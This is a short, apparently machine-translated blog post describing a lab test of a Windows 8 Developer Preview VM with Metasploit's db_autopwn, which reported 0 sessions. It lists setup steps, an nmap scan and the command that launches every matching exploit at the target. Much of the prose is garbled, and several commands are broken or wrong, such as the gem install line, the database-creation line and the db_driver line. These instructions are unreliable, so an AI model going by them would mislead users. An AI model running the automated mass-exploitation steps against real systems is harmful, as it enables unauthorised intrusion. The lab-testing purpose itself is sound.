Metasploit db_autopwn Windows 8

Yesterday (or above) Microsoft made available "Windows 8 Developer Preview" for anyone to download. I hize installation in VirtualBox following this guide (in English).

Wanted to see if Microsoft may have used some libraries / programs of early Windows versions that may have vulnerabilities that remote and Metesploit have an exploit for it.

For this i'am used the Metasploit db_autopwn to use all the exploits that have ports for Windows 8 Developer has opened. At the same look will be a quick and simple test.

(BT5 Configuration for R1, using Metasploit review 13 728)

Setting up MySQL

Install the Ruby gem 'mysql' :

gem install mysql-install-user

Start the MySQL server :

service mysql start

Connect to the MySQL server (password 'toor') :

mysql -u root -p

Create a database for Metasploit :

msf create database;

You can now exit the MySQL client:

    exit

Prepare Metasploit

Start at the Metasploit Console (msfconsole) :

/Pentest/exploits/framework/msfconsole

Metaploit configured to use the MySQL driver :

mysql db_driver

Connecta to database 'msf' :

db_connect root:toor@localhost/msf

Find out if we connect :

DB_STATUS

Make an nmap scan against the system of Windows 8. The results are automatically stored in the SPS database :

db_nmap -Pn 192.168.1.115

Finally, run db_autopwn!

db_autopwn -p -t -e

The results?!

[*] The autopwn command completed with 0 sessions have

But hey, I thought it was worth trying..........




Regards

ethicalhack3r